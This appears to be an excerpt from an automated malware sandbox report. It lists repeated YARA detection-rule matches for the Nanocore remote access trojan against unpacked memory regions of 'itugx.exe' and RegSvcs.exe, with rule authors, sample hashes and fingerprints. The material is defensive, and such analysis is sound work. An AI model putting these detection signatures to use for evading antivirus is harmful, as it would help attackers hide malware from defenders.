      Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
